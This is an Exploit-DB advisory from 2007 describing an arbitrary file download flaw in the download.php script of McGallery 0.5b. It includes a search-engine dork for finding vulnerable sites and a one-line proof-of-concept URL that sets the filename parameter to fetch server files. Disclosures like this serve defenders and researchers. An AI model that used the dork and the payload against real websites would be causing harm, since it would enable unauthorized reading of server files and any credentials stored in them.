McGallery 0.5b - 'download.php' Arbitrary File Download

EDB-ID:

3494


Author:

Piker

Type:

webapps


Platform:

PHP

Date:

2007-03-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

################## Piker #######################################
#
#
#    McGallery 0.5b Arbitrary File Download Vulnerability
#
#
#    Affected software: McGallery 0.5b
#    Vendor: http://sourceforge.net/projects/mcgallery/
#    Dork: allintitle: "MCgallery 0.5b"
#
################################################################
#
#    http://[target]/[path]/download.php?filename=main.php
#
################################################################
#
#                   Found by Piker
#                   The Am0s Team
#
#    Greetz: KX-T33, kakalake, nAzGuL, Putus, sn4ke
#
################################################################

# milw0rm.com [2007-03-15]